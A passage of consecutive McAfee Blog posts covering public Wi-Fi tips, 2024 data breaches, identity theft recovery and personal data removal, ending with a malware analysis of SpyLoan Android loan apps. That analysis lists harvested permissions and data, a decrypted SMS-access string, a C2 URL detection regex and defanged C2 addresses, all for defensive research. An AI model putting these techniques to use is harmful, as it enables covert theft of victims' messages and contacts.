Not all Wi-Fi networks are created equal. Some are outright traps set by hackers to lure unsuspecting users. Always verify the official network name with a staff member before connecting, especially in places like airports, hotels, or cafes. Knowing how to identify suspicious networks can save you from connecting to a rogue hotspot.

Red Flags to Watch For: 

• Unsecured Networks: If a network doesn’t require a password, it’s a potential risk. 
• Strange Network Names: Be wary of networks with names that are misspelled or mimic legitimate ones (e.g., “Airport_FreeWiFi” instead of “Airport Free Wi-Fi”). 
• Unusual Login Pages: If a Wi-Fi network asks for excessive personal information to connect, it could be a scam.

4. Keep Your Devices Secure

Protecting your data on public Wi-Fi isn’t just about the network—it’s also about securing your devices. Cybercriminals can exploit vulnerabilities in your smartphone, tablet, or laptop to gain access to your personal information. 

Device Security Tips: 

• Update Your Software: Keep your operating system, apps, and security software up to date to patch any vulnerabilities. 
• Use Antivirus Software: Install reliable antivirus software to detect and block malware or suspicious activity. 
• Enable Firewall Protection: A firewall acts as a gatekeeper for your internet connection by filtering and analyzing incoming data. As the first line of defense, they block unauthorized access and prevent malicious programs from infiltrating your network. 
• Turn Off Automatic Wi-Fi Connections: Disable the feature that automatically connects your device to open Wi-Fi networks. 
• Clear Your Browser Cache: Delete cookies and browsing history to remove any stored login credentials. 

Stay Safe and Enjoy Your Winter Travels 

Public Wi-Fi can be a lifesaver when you’re traveling, but it doesn’t have to be a risk. By following these simple tips—using a VPN, avoiding sensitive transactions, and securing your devices—you can enjoy your winter adventures without compromising your personal data. So, whether you’re sipping hot cocoa in a ski lodge or waiting for a flight home, stay connected, stay secure, and make the most of your winter travels. 

The post How to Protect Your Data While On-the-Go appeared first on McAfee Blog.

It’s been a big year for big data breaches. Billions of records on millions of people have been exposed at an estimated cost of nearly $10 trillion dollars to people and businesses alike worldwide.[i]

While we still have a few weeks in the year left to go, here’s a roundup of five of the most noteworthy breaches this year. And while you can’t prevent big data breaches from happening, you can still take several preventive steps to protect yourself from the fallout. We’ll cover them here too.

The National Public Data (NPD) breach

News of a major data breach that involved nearly three billion records came to light over the summer from a somewhat unusual source — a class-action complaint filed in Florida.

The complaint concerned National Public Data (NPD), a company that provides background checks. Per their website, “[NPD obtains] information from various public record databases, court records, state and national databases, and other repositories nationwide.”

The complaint alleged that NPD was hit by a data breach in or around April 2024. [ii] The complaint filed in the U.S. District Court further alleges:

• The company had sensitive info breached, such as full names; current and past addresses spanning at least the last three decades); Social Security numbers; info about parents, siblings, and other relatives (including some who have been deceased for nearly 20 years); and other personal info.
• The company “scraped” this info from non-public sources. This info was collected without the consent of the person who filed the complaint and the billions of others who might qualify to join in the class action complaint.
• The company “assumed legal and equitable duties to those individuals to protect and safeguard that information from unauthorized access and intrusion.”

Typically, companies self-report these breaches, thanks to regulations and legislation that require them to do so in a timely manner. That way, initial word of breaches reaches customers through emails, news reports, and sometimes through notifications to certain state attorney generals.

In this case, it appeared that no notices were immediately sent to potential victims.

As to how the primary plaintiff discovered the breach, he “received a notification from his identity theft protection service provider notifying him that his [personal info] was compromised as a direct result of the ‘nationalpublicdata.com’ breach …” (And you can certainly add online protection software to the list of ways you can find out about a data breach before a company notifies you.)

Further, in June, The Register reported that a hacker group by the name of USDoD claimed it hacked the records of 2.9 billion people and put them up for sale on the dark web.[iii] The price tag, U.S. $3.5 million. The group further claimed that the records include U.S., Canadian, and British citizens.

The Ticketmaster breach

Just how big was the Ticketmaster data breach? It appears that over a half-billion people might have had their personal info compromised.

Ticketmaster’s parent company, Live Nation Entertainment, first announced the breach in late May. The company said that it had identified “unauthorized activity” from April 2 to May 18, 2024.

Soon after, the noted hacking group ShinyHunters claimed responsibility for the breach.[iv] According to the hackers, their 1.3 terabyte haul of data includes 560 million people — along with a mix of their names, addresses, email addresses, phone numbers, order information, and partial payment card details. They allegedly posted that info for sale on the dark web in late May.[v]

Live Nation then began notifying potential victims by physical mail, stating:

“The personal information that may have been obtained by the third party may have included your name, basic contact information, and <extra>.”

Per a support document posted by Ticketmaster, the <extra> part varied by individual. Depending on what was compromised, that might have included “email, phone number, encrypted credit card information as well as some other personal information provided to [Ticketmaster].”[vi]

A breach at insurance and financial tech vendor, Infosys McCamish Systems

Also affecting millions of people in 2024, a breach at Infosys McCamish Systems (IMS), a company that provides solutions and services to insurance companies and financial institutions. Per an announcement from IMS[vii], the company,

“[D]etermined that unauthorized activity occurred between October 29, 2023, and November 2, 2023. Through the investigation, it was also determined that data was subject to unauthorized access and acquisition.”

There’s a good chance you haven’t heard of IMS before reading this article. Yet to put the attack in perspective, it affected people who hold accounts with companies like Bank of America, Oceanview Life and Annuity Company, Fidelity Investments Life Insurance, Newport Group, and Union Labor Life Insurance.

Also per IMS, the full run of personal info swept up in the attack included:

Notifications went out to potential victims in several ways and at several times. Bank of America sent notices to 50,000 people in February, alerting them that their info was compromised by an unidentified third party.[viii] Fidelity Investments Life Insurance notified 28,000 potential victims in March.[ix] In late June, IMS began contacting the six million potential victims overall — eight months after the date of the initial attack.[x]

A breach at a U.S. debt collector — Financial Business and Consumer Solutions

The second breach involves (FBCS), a bonded collection agency based on the U.S. east coast. On February 26, 2024, the company noted unauthorized access to their systems, which covered a twelve-day period starting on February 14.[xi] In an April notice of a “data event,” FBCS stated that people might have had the following info compromised:

“[C]onsumer name, address, date of birth, Social Security number, driver’s license number, other state identification number, medical claims information, provider information, and clinical information (including diagnosis/conditions, medications, and other treatment information), and/or health insurance information.”

FBCS went on to say that the compromised info varied from person to person.

Initially, the scope of the breach appeared to approach two million victims.[xii] Several updated filings continued to increase that number. At last reporting, the figure had ballooned to more than four million people affected.[xiii]

The AT&T breach

In April, mobile carrier AT&T learned that hackers had stolen the call and text logs of nearly all its customers, estimated at nearly 100 million people. That further included customers who used Cricket, Boost Mobile, and Consumer Cellular, which are mobile virtual network operators (MVNOs) that use AT&T’s network.

The compromised data covered a period between May 1, 2022, and October 31, 2022, with a small number of records from January 2, 2023, also affected. According to AT&T, hackers gained access through a third-party cloud platform account.[xiv]

The stolen data revealed the phone numbers customers communicated with, along with the frequency and total duration of calls and texts for specific periods. In this way, the breach affected more than just customers of AT&T — it affected anyone who may have called or texted with an AT&T customer.

However, AT&T assured customers that the content of calls or texts, timestamps, Social Security numbers, dates of birth, or other personal details were not compromised.

Of concern, a determined hacker with access to the data could infer a lot from these logs, such as businesses and people customers regularly speak with. In turn, this could fuel phishing scams by giving them extra credibility if the scammer poses as the businesses and people involved.

How to protect yourself against data breaches

These breaches show the risks and frustrations that we, as consumers, face in the wake of such attacks. It often takes months before we receive any kind of notification. And of course, that gap gives hackers plenty of time to do their damage. They might use stolen info to commit identity crimes, or they might sell it to others who’ll do the same. Sometimes, we’re in the dark about a data breach until we get hit with a case of identity theft ourselves.

Indeed, plenty of breaches go unreported or under-reported. Even so, word of an attack that affects you might take some time to reach you. With that, preventative measures offer the strongest protection from data breaches.

To fully cover yourself, we suggest the following:

Check your credit, consider a security freeze, and get ID theft protection.

With your personal info potentially on the dark web, strongly consider taking preventive measures now. Checking your credit and getting identity theft protection can help keep you safer in the aftermath of a breach. Further, a security freeze can help prevent identity theft if you spot any unusual activity. You can get all three in place with our McAfee+ Advanced or Ultimate plans. Features include:

• Credit monitoring keeps an eye on changes to your credit score, report, and accounts with timely notifications and guidance so you can take action to tackle identity theft.
• Security freeze protects you proactively by stopping unauthorized access to existing credit card, bank, and utility accounts or from new ones being opened in your name. And it won’t affect your credit score.
• ID Theft & Restoration Coverage gives you $2 million in identity theft coverage and identity restoration support if it is determined you’re a victim of identity theft.​ This way, you can cover losses and repair your credit and identity with a licensed recovery expert.

Monitor your identity and transactions.

Breaches and leaks can lead to exposure, particularly on dark web marketplaces where personal info gets bought and sold. Our Identity Monitoring can help notify you quickly if that happens. It keeps tabs on everything from email addresses to IDs and phone numbers for signs of breaches. If spotted, it offers advice that can help secure your accounts before they’re used for identity theft.​

Also in our McAfee+ plans, you’ll find several types of transaction monitoring that can spot unusual activity. These features track transactions on credit cards and bank accounts — along with retirement accounts, investments, and loans for questionable transactions. Finally, further features can help prevent a bank account takeover and keep others from taking out short-term payday loans in your name.

Keep an eye out for phishing attacks.

With some personal info in hand, bad actors might seek out more. They might follow up a breach with rounds of phishing attacks that direct you to bogus sites designed to steal your personal info — either by tricking you into providing it or by stealing it without your knowledge. So look out for phishing attacks, particularly after breaches.

If you are contacted by a company, make certain the communication is legitimate. Bad actors might pose as them to steal personal info. Don’t click or tap on links sent in emails, texts, or messages. Instead, go straight to the appropriate website or contact them by phone directly.

For even more security, you can use our Text Scam Detector. It scans links in texts and lets you know if it’s risky. And if you accidentally click or tap a bad link, it blocks the sketchy sites they can take you to.

Update your passwords and use two-factor authentication.

Changing your password is a strong preventive measure. Strong and unique passwords are best, which means never reusing your passwords across different sites and platforms. Using a password manager helps you keep on top of it all, while also storing your passwords securely.

While a strong and unique password is a good first line of defense, enabling two-factor authentication across your accounts helps your cause by providing an added layer of security. It’s increasingly common to see nowadays, where banks and all manner of online services will only allow access to your accounts after you’ve provided a one-time passcode sent to your email or smartphone.

[i] https://www.statista.com/forecasts/1280009/cost-cybercrime-worldwide

[ii]https://www.bloomberglaw.com/public/desktop/document/HofmannvJericoPicturesIncDocketNo024cv61383SDFlaAug012024CourtDoc?doc_id=X6S27DVM6H69DSQO6MTRAQRIVBS

[iii] https://www.theregister.com/2024/06/03/usdod_data_dump/

[iv] https://www.pcmag.com/news/ticketmaster-confirms-user-email-addresses-phone-numbers-stolen-in-hack

[v] https://www.sec.gov/Archives/edgar/data/1335258/000133525824000081/lyv-20240520.htm

[vi] https://help.ticketmaster.com/hc/en-us/articles/26110487861137-Ticketmaster-Data-Security-Incident

[vii] https://www.infosysbpm.com/mccamish/about/notice-of-cybersecurity-incident.html

[viii] https://www.bankinfosecurity.com/bank-america-responds-to-breach-a-4487

[ix] https://www.securityweek.com/fidelity-investments-notifying-28000-people-of-data-breach/

[x] https://www.maine.gov/agviewer/content/ag/985235c7-cb95-4be2-8792-a1252b4f8318/b152fd39-9f84-4ca5-a149-d20b94ed8ef6.html

[xi] https://www.fbcs-inc.com/cyber-incident/

[xii] https://www.maine.gov/agviewer/content/ag/985235c7-cb95-4be2-8792-a1252b4f8318/5fe1ede5-aafd-4da2-b1a4-0057a6cdadc6.shtml

[xiii] https://www.maine.gov/agviewer/content/ag/985235c7-cb95-4be2-8792-a1252b4f8318/7e6ff931-a035-480f-a977-e11a8af7f768.html

[xiv] https://about.att.com/story/2024/addressing-illegal-download.html

The post 2024 Data Breaches Wrapped appeared first on McAfee Blog.

When it comes to identity theft, trust your gut when something doesn’t feel right. Follow up. What you’re seeing could be a problem.  

A missing bill or a mysterious charge on your credit card could be the tip of an identity theft iceberg, one that can run deep if left unaddressed. Here, we’ll look at several signs of identity theft that likely need some investigation and the steps you can take to take charge of the situation.  

How does identity theft happen in the first place?  

Unfortunately, it can happen in several ways.   

In the physical world, it can happen simply because you lost your wallet or debit card. However, there are also cases where someone gets your information by going through your mail or trash for bills and statements. In other more extreme cases, theft can happen by someone successfully registering a change of address form in your name (although the U.S. Postal Service has security measures in place that make this difficult).   

In the digital world, that’s where the avenues of identity theft blow wide open. It could come by way of a data breach, a thief “skimming” credit card information from a point-of-sale terminal, or by a dedicated crook piecing together various bits of personal information that have been gathered from social media, phishing attacks, or malware designed to harvest information. Additionally, thieves may eavesdrop on public Wi-Fi and steal information from people who are shopping or banking online without the security of a VPN.  

Regardless of how crooks pull it off, identity theft is on the rise. According to the Federal Trade Commission (FTC), identity theft claims jumped up from roughly 650,000 claims in 2019 to 1 million in 2023. Of the reported fraud cases where a dollar loss was reported, the FTC calls out the following top three contact methods for identity theft:  

• Online ads that direct you to a scammer’s site are designed to steal your information.  
• Malicious websites and apps also steal information when you use them.  
• Social media scams lure you into providing personal information, whether through posts or direct messages.  

However, phone calls, texts, and email remain the most preferred contact methods that fraudsters use, even if they are less successful in creating dollar losses than malicious websites, ads, and social media.  

What are some signs of identity theft?  

Identity thieves leave a trail. With your identity in hand, they can charge things to one or more of your existing accounts—and if they have enough information about you, they can even create entirely new accounts in your name. Either way, once an identity thief strikes, you’re probably going to notice that something is wrong. Possible signs include:  

• You start getting mail for accounts that you never opened.   
• Statements or bills stop showing up from your legitimate accounts.  
• You receive authentication messages for accounts you don’t recognize via email, text, or phone.   
• Debt collectors contact you about an account you have no knowledge of.  
• Unauthorized transactions, however large or small, show up in your bank or credit card statements.  
• You apply for credit and get unexpectedly denied.  
• And in extreme cases, you discover that someone else has filed a tax return in your name.  

As you can see, the signs of possible identity theft can run anywhere from, “Well, that’s strange …” to “OH NO!” However, the good news is that there are several ways to check if someone is using your identity before it becomes a problem – or before it becomes a big problem that gets out of hand.   

Steps to take if you suspect that you’re the victim of identity theft  

The point is that if you suspect fraud, you need to act right away. With identity theft becoming increasingly commonplace, many businesses, banks, and organizations have fraud reporting mechanisms in place that can assist you should you have any concerns. With that in mind, here are some immediate steps you can take:  

1) Notify the companies and institutions involved  

Whether you spot a curious charge on your bank statement or you discover what looks like a fraudulent account when you get your free credit report, let the bank or business involved know you suspect fraud. With a visit to their website, you can track down the appropriate number to call and get the investigation process started.   

2) File a police report  

Some businesses will require you to file a local police report to acquire a case number to complete your claim. Even beyond a business making such a request, filing a report is still a good idea. Identity theft is still theft and reporting it provides an official record of the incident. Should your case of identity theft lead to someone impersonating you or committing a crime in your name, filing a police report right away can help clear your name down the road. Be sure to save any evidence you have, like statements or documents that are associated with the theft. They can help clean up your record as well.  

3) Contact the Federal Trade Commission (FTC)  

The FTC’s identity theft website is a fantastic resource should you find yourself in need. Above and beyond simply reporting the theft, the FTC can provide you with a step-by-step recovery plan—and even walk you through the process if you create an account with them. Additionally, reporting theft to the FTC can prove helpful if debtors come knocking to collect on any bogus charges in your name. You can provide them with a copy of your FTC report and ask them to stop.  

4) Place a fraud alert and consider a credit freeze  

You can place a free one-year fraud alert with one of the major credit bureaus (Experian, TransUnion, Equifax), and they will notify the other two. A fraud alert will make it tougher for thieves to open accounts in your name, as it requires businesses to verify your identity before issuing new credit in your name.  

A credit freeze goes a step further. As the name implies, a freeze prohibits creditors from pulling your credit report, which is needed to approve credit. Such a freeze is in place until you lift it, and it will also apply to legitimate queries as well. Thus, if you intend to get a loan or new credit card while a freeze is in place, you’ll likely need to take extra measures to see that through. Contact each of the major credit bureaus (Experian, TransUnion, Equifax) to put a freeze in place or lift it when you’re ready.  

5) Dispute any discrepancies in your credit reports  

This can run the gamut from closing any false accounts that were set up in your name, removing bogus charges, and correcting information in your credit report such as phony addresses or contact information. With your FTC report, you can dispute these discrepancies and have the business correct the record. Be sure to ask for written confirmation and keep a record of all documents and conversations involved.   

6) Contact the IRS, if needed  

If you receive a notice from the IRS that someone used your identity to file a tax return in your name, follow the information provided by the IRS in the notice. From there, you can file an identity theft affidavit with the IRS. If the notice mentions that you were paid by an employer you don’t know, contact that employer as well and let them know of possible fraud—namely that someone has stolen your identity and that you don’t truly work for them.  

Also, be aware that the IRS has specific guidelines as to how and when they will contact you. As a rule, they will most likely contact you via physical mail delivered by the U.S. Postal Service. (They won’t call or apply harassing pressure tactics—only scammers do that.) Identity-based tax scams are a topic all of their own, and for more on it, you can check out this article on tax scams and how to avoid them.  

7) Continue to monitor your credit report, invoices, and statements  

Another downside of identity theft is that it can mark the start of a long, drawn-out affair. One instance of theft can possibly lead to another, so even what may appear to be an isolated bad charge on your credit card calls for keeping an eye on your identity. Many of the tools you would use up to this point still apply, such as checking up on your credit reports, maintaining fraud alerts as needed, and reviewing your accounts closely.  

Preventing identity theft 

With all the time we spend online as we bank, shop, and simply surf, we create and share all kinds of personal information—information that can get collected and even stolen. The good news is that you can prevent theft and fraud with online protection software, such as McAfee+ Ultimate.  

With McAfee+ Ultimate you can: 

• Monitor your credit activity on all three major credit bureaus to stay on top of unauthorized use.​ 
• Also, monitor the dark web for breaches involving your personal info and notify you if it’s found.​ 
• Lock or freeze your credit file to help prevent accounts from being opened in your name. 
• Remove your personal info from over 40 data broker sites collecting and selling it. 
• Restore your identity with a licensed expert should the unexpected happen.​ 
• Receive $1M identity theft and stolen funds coverage along with additional $25K ransomware coverage. 

​In all, it’s our most comprehensive privacy, identity, and device protection plan, built for a time when we rely so heavily on the internet to go about our day, whether that’s work, play, or simply getting things done. 

Righting the wrongs of identity theft: deep breaths and an even keel  

Realizing that you’ve become a victim of identity theft carries plenty of emotion with it, which is understandable—the thief has stolen a part of you to get at your money, information, and even reputation. Once that initial rush of anger and surprise has passed, it’s time to get clinical and get busy. Think like a detective who’s building – and closing – a case. That’s exactly what you’re doing. Follow the steps, document each one, and build up your case file as you need. Staying cool, organized, and ready with an answer to any questions you’ll face in the process of restoring your identity will help you see things through.  

Once again, this is a good reminder that vigilance is the best defense against identity theft from happening in the first place. While there’s no absolute, sure-fire protection against it, there are several things you can do to lower the odds in your favor. And at the top of the list is keeping consistent tabs on what’s happening across your credit reports and accounts.  

The post How to Detect Signs of Identity Theft appeared first on McAfee Blog.

While you can’t delete your personal info from the internet entirely, you can take strong steps to remove it from risky places. Several where others could tap into it for profit or harm. 

Why is it so important to take control of our personal info? It has street value, and it has for some time now. Because so much of business, finance, healthcare, and life in general runs on it, your personal info has a dollar sign to it. Plenty of people want to get a hold of it. 

Personal info fuels targeted advertising and marketing campaigns, just as it helps adjusters set insurance rates and healthcare providers make projections about our well-being. Businesses want it for employment background checks. Law enforcement uses it when investigating persons of interest. Banks and credit card companies base their approvals on it. Websites and apps collect it for their own purposes, which they sometimes share or sell to third parties. 

And of course, hackers, scammers, and thieves want it too. To steal your identity, drain your accounts, and wage other attacks on you.  

No doubt, your personal info has value. High value. And that makes a strong argument for doing what you can to control what you share and where you share it to the best possible degree. With so much that hinges on your personal info, it’s good to know that you can take control in powerful ways. We’ll show how it’s far easier to do that today than ever before. 

Get to know your digital shadow. 

Taking control of your personal info starts with a look at your digital shadow. Everyone casts one. And like everyone else’s digital shadow, yours gets filled with info about you — personal info stored online across the internet. 

For starters, your digital shadow includes things like posts in forums, social media profiles, the posts that you put up there, and other people’s posts that mention you. It includes other sources of info, like pictures of you in an online newsletter, your name listed in the standings of your co-ed soccer league, and a bio of you on your company’s “About Us” page. Online reviews provide potential sources too. In all, this part of your digital shadow grows larger in two ways — as you say more things, and as more things are said about you.  

Your shadow grows yet more with the addition of public records. That might include what you paid for your home, who lives there with you, your age, your children, your driving record, education, occupation, and estimated income. It all depends on where you live and what data regulations are in place there. Some regions have stricter privacy rules in place than others when it comes to public records. For example, in the U.S., California, Virginia, Connecticut, Colorado, Utah, Iowa, Indiana, Tennessee, Oregon, Montana, Texas, and Delaware have strong data privacy laws on the books. The European Union has its well-known GDPR, the General Data Protection Regulation, in place. 

Then there’s all manner of info about you gathered and sold by online data brokers. Data brokers pull hundreds of data points from public sources, not to mention private sources like supermarket club cards that track your shopping history. Other private sources include info from app developers and websites with less restrictive privacy policies when it comes to sharing and selling info. These data brokers sell personal info to anyone who’ll pay, including hackers, scammers, and spammers. 

Finally, a sizable swathe of your shadow comes from info stored on the deep web. It forms the 95% of the internet that’s not searchable. Yet, you likely take trips there daily. Any time you go through a paywall or use a password to access internet content, you’re entering the deep web.  

Examples include logging into your bank account, accessing medical records through your healthcare provider, or using corporate web pages as part of your workday. Even streaming a show can involve a trip to the deep web. None of that content is searchable.  

What’s in there, aside from your Netflix viewing history? Think of all the info that forms the basis of your credit score, your health history, your financial info, and all the info that websites and advertisers capture about you as you simply spend time online. That’s the deep web too. 

A subset of the deep web is the dark web. It’s not searchable as well, and it requires a special browser to access. Some of the sites and data stores found there are entirely legitimate, others questionable, and several are outright illegal. Some of your info might be there too. And yes, you’ll find dark marketplaces here where bad actors put up personal info for sale. 

Everyone online indeed has a digital shadow. And some shadows are longer than others.   

Taking control of your personal info matters, perhaps more than you think. 

So, what’s the big deal? That’s how the internet works, right? 

That’s a fair question. Part of the answer comes down to how important a person thinks their privacy is. Yet, more objectively, keeping a lower profile online offers better protection from cybercrime. 

Consider research published by the science journal Nature, in 2019. Here’s an excerpt from the authors: 

Using our model, we find that 99.98% of Americans would be correctly re-identified in any dataset using 15 demographic attributes. Our results suggest that even heavily sampled anonymized datasets are unlikely to satisfy the modern standards for anonymization set forth by GDPR [Europe’s General Data Protection Regulation] and seriously challenge the technical and legal adequacy of the de-identification release-and-forget model.

Put in practical terms, imagine a hacker or snoop gets their hands on a large set of public or private data. Like say, health data about certain medical conditions. Even though that data has been “scrubbed” to make the people in it anonymous, that hacker or snoop only needs 15 pieces of info to identify you in that mix. From there, they could pinpoint any health conditions linked to you. 

In a time when all kinds of organizations gather all kinds of data, the impact of this research finding is clear. Data breaches happen, and a determined person can spot you in a batch of breached data with relative ease. They have several tools readily available that can cobble together those other 15 pieces of info to identify you. That further strengthens the argument for taking control of your personal info. 

Deleting your info on the internet has its benefits. 

Shortening your so-called digital shadow helps improve everyday life in several ways. It can: 

Cut down the number of sketchy texts, emails, and calls you get. If a hacker, scammer, or spammer can’t track down your contact info, they can’t reach you on your computers and phones. Removing info from data broker sites, old accounts you no longer use, and even social media can make it harder for them to reach you. 

Reduce the risk of identity crimes, like theft, fraud, and harassment. Bad actors turn people’s info against them. With it, they take out loans in other people’s names, file bogus insurance claims, and, in more extreme cases, impersonate others for employment or criminal purposes. When you have less info online, they have less info to work with. That makes their attacks tougher to pull off. So tough that they might turn to another, easier target who has much more info online. 

Keep snoops out of your business when taking care of things online. Tracking and monitoring are simple facts of going online. Sites and businesses do it for performance and marketing purposes. Hackers and bad actors do it for outright theft. Taking steps to mask and outright hide your activities online benefits your privacy and your security. 

Take control of what people do and don’t know about you. Most broadly, increased privacy largely gives you the power to share your info. Not someone else. The fact is that many companies share info with other companies. And some of those other third parties might have looser data privacy and data security measures in place. What’s more, you likely have no idea who those third parties are. Increased privacy helps you take far more control of where your info does and doesn’t go. 

Five ways you can delete your info from the internet. 

The following can help: 

1. Delete old apps. And be choosy about permissions on your phones. Fewer apps mean fewer avenues of potential data collection. If you have old, unused apps, consider deleting them, along with the accounts and data linked with them.  

 2. Delete old accounts. Many internet users can have over 350 online accounts, many of which they might not know are still active. McAfee Online Account Cleanup can help you delete them. It runs monthly scans to find your online accounts and shows you their risk level. From there, you can decide which to delete, protecting your personal info from data breaches and your overall privacy as a result. 

 3. Make your social media accounts more private. Our new McAfee Social Privacy Manager helps safeguard your privacy on social media by personalizing your privacy based on your preferences. It does the heavy lifting by adjusting more than 100 privacy settings across your social media accounts in only a few clicks. This ensures that your personal info is only visible to the people you want to share it with. It also keeps it out of search engines where the public can see it.

4. Remove your info from data brokers that sell it. McAfee Personal Data Cleanup helps you remove your personal info from many of the riskiest data broker sites out there. Running this feature regularly can keep your name and info off these sites, even as data brokers collect and post new info. Depending on your plan, it can send requests to remove your data automatically. 

 5. Take preventive measures. A few steps can help you keep your info off the internet in the first place. A VPN helps make your time online more private and more secure by obscuring things like your IP address and other identifying info. It also prevents hackers and snoops from monitoring your activity when you bank, shop, and access other accounts. Also, check out our article that covers privacy on your phone. Because phones offer others so many ways to gather personal info, making your phone more private helps make you more private. 

The post How to Delete Yourself from the Internet appeared first on McAfee Blog.

Authored by: Fernando Ruiz

The McAfee mobile research team recently identified a significant global increase of SpyLoan, also known as predatory loan apps, on Android. These PUP (potentially unwanted programs) applications use social engineering tactics to trick users into providing sensitive information and granting extra mobile app permissions,  which can lead to extortion, harassment, and financial loss. 

During our investigation of this threat, we identified fifteen apps with a combined total of over eight million installations.  This group of loan apps share a common framework to encrypt and exfiltrate data from a victim’s device to a command and control (C2) server using a similar HTTP endpoint infrastructure. They operate localized in targeted territories, mainly in South America, Southern Asia, and Africa, with some of them being promoted through deceptive advertising on social media.  

McAfee is a member of the App Defense Alliance focused on protecting users by preventing threats from reaching their devices and improving app quality across the ecosystem. We reported the apps discovered to Google who have notified the developers that their apps violate Google Play policies and fixes are needed to come into compliance. Some apps were suspended from Google Play while others were updated by the developers. 

McAfee Mobile Security detects all of these apps as Android/PUP.SpyLoan due to our PUP policy since even after some apps have updated to reduce the permissions requirements and the harvesting of sensitive information they still pose a risk for the user’s privacy due to the potential unethical practices that can be conducted by the operators of these apps that are not licensed or registered with the authorities that regulate financial services in each jurisdiction where they operate. 

Since 2020, SpyLoan has become a consistent presence   in the mobile threat landscape. However, our telemetry indicates a rapid surge in their activity recently. From the end of Q2 to the end of Q3 2024, the number of malicious SpyLoan apps and unique infected devices has increased by over 75%.   

Understanding the Threat

What Are SpyLoan Apps?

SpyLoan apps are intrusive financial applications that lure users with promises of quick and flexible loans, often featuring low rates and minimal requirements. While these apps may seem to offer genuine value, the reality is that these apps primarily exist to collect as much personal information as possible, which they then may exploit to harass and extort users into paying predatory interest rates. They employ questionable tactics, such as deceptive marketing that highlights time-limited offers and countdowns, creating a false sense of urgency to pressure users into making hasty decisions. Ultimately, rather than providing genuine financial assistance, these apps can lead users into a cycle of debt and privacy violations. 

While the specific behavior may vary by country, these apps share common characteristics and code at app and infrastructure level: 

• Distribution via Official App Stores: Despite violating policies, these apps often slip through app store vetting processes and are available on platforms like Google Play, making them appear trustworthy. 
• Deceptive Marketing: They use names, logos, and user interfaces that mimic reputable financial institutions to gain credibility. Often these loan apps are promoted by ads on social media networks 

“High amount of loan” Add on Facebook for app “Presta Facil: Revision Rapida” which translate to “Easy Loan: Fast Approval” detailing interest rates, amount, period, etc for a loan in Colombian pesos. 

• Similar user flow: After first execution a privacy policy is displayed with the details of what information will be collected, then a countdown timer creates the sense of urgency to apply to the loan offer and the user’s phone number with the country code of the targeted territory is required to continue, asking for a one-time-password (OTP) that is received by SMS to authenticate the user and validate that user has a phone number from the targeted country. 

SpyLoan apps are consistent with this onboarding process. Then navigation bar and app actions are very similar with different graphics but have the same features in their respective localized languages. 

Both apps have in common a framework that shares the user interface, user’s flow and encryption libraries with techniques for communication with C2 infrastructure, while the operators have different locations, language and target countries.

• Privacy agreements: These apps have similar but not equal privacy terms, in general they describe and justify the sensitive data to be collected as part of the user identification process and anti-fraud measures.
  • They require users to consent to collect excessive and exploitative data that a formal financial institution would not normally require, such as SMS message content, call logs and contact lists.
  • The contact information of the financial institution is from free service email domain like Gmail or Outlook, like a personal email address, not from a formal and legal financial institution.
  • The websites implementation of the privacy terms of these SpyLoans apps are built with the same web-framework, using JavaScript to dynamically load the content of the terms, this text is not available in the HTML files directly.

• Excessive Permission Requests: Upon installation, they request permissions that are unnecessary for a loan app, such as access to contacts, SMS, storage, calendar, phone call records and even microphone or camera.

Common permissions on SpyLoan applications can be:

• • permission.CAMERA
  • permission.READ_CALL_LOG
  • permission.READ_PHONE_STATE
  • permission.ACCESS_COARSE_LOCATION
  • permission.READ_SMS

Depending on the implementation and distribution method they can include more sensitive permissions.

• Enticing Offers: Promising quick loans with minimal requirements to attract users in urgent financial situations. A countdown might be displayed to increase the sense of urgency.

Phone Validation via SMS OTP: To complete the registration a phone number with the country code of the target country is required to validate the user’s phone is on the territory, receiving an one time password (OTP) to proceed to the registration via text message.

Data Collection: Users are prompted to provide sensitive legal identification documents and personal information, banking accounts, employee information among with device data that is exfiltrated from the victim’s device.

Impact on Users

Financial Exploitation

• Hidden Fees and High Interest Rates: Users receive less than the promised loan amount but are required to repay the full amount plus exorbitant fees within a short period.
• Unauthorized Charges: Some apps initiate unauthorized transactions or charge hidden fees.

Privacy Violations

• Data Misuse: Personal information is exploited for blackmail or sold to third parties. This might include sextortion with victims’ pictures that can be exfiltrated or created with AI.
• Harassment and Extortion: Users and their contacts receive threatening messages or calls including death threats.

Emotional and Psychological Distress

• Stress and Anxiety: Aggressive tactics cause significant emotional harm.
• Reputational Damage: Public shaming can affect personal and professional relationships.

Back to 2023 in Chile media reported the suicide of a victim of fake loans after the harassment and threats to her friends and family and to her integrity.

Data Exfiltration analysis

The group of SpyLoan applications reported in this blog belongs to the family identified by McAfee as Android/SpyLoan.DE that transmits the collected information encrypted to the command and control (C2) using AES (Advanced encryption standard) with 128bits keys then base64 encoding and optionally adds a hardcoded padding over https.

Encryption key and initialization vector (IV) are hardcoded into the obfuscated application code.

SpyLoan uses this same encryption routine to hide sensitive strings on resources.xml that leads to data exfiltration, for example:

• String skadnjskdf in resources.xml:
  • <string name=”skadnjskdf”>501tm8gR24S8F8BpRDkvnw==</string>
• The AES decrypted value using the same encryption routine implemented for data exfiltration:
  • <string name=”skadnjskdf”>content://sms/</string>

This string is used to construct a content URI that allows access to SMS Messages that it’s implemented to extract fields like, date, address (sender/recipient), message body, status, etc., and formats into JSON that then will be encrypted again to be sent to the C2.

Figure 6: Code section that exfiltrates all SMS messages from Victim’s device

Exfiltrated data is posted into the C2 via HTTP post inside an encrypted JSON object. The URLs of the endpoints used to collect sensitive data shares the URL structure between different SpyLoan applications. They use the same URLs scheme that can be detected by this regex:

^https:\/\/[a-z0-9.-]+\/[a-z]{2,}-gp\/[a-z0-9]+\/[a-z0-9]+$

Some examples of C2 URLs that match this scheme:

• hxxps://su.mykreditandfear.com/her-gp/kgycinc/wjt
• hxxps://hx.nihxdzzs.com/dz-gp/cfmwzu/uyeo
• hxxps://prep.preprestamoshol.com/seg-gp/pdorj/tisqwfnkr
• hxxps://tlon.pegetloanability.com/anerf-gp/jwnmk/dgehtkzh

Using the same technique and obfuscation methods SpyLoan samples hide in his code the ability to exfiltrate larges amount of sensitive data from their victims, including:

• Call Logs: Collects call log data from the device if permissions are granted
  • Number: The phone number of the caller
  • Type: Type of call (incoming, outgoing, missed)
  • Duration: The duration of the call
  • Date: The timestamp of the call
  • Name: The name of the contact (if available)
• Files in download directory with metadata: file name, extension, file size, last modified timestamp
• All accounts on the device, emails and social media accounts.
• Information about all apps installed

Other miscellaneous information collected:

• Device and Network information:
  • Subscriber ID
  • DNS Information
  • Device ID (IMEI)
  • MAC address
  • Country code
  • Network Operator Name
  • Language
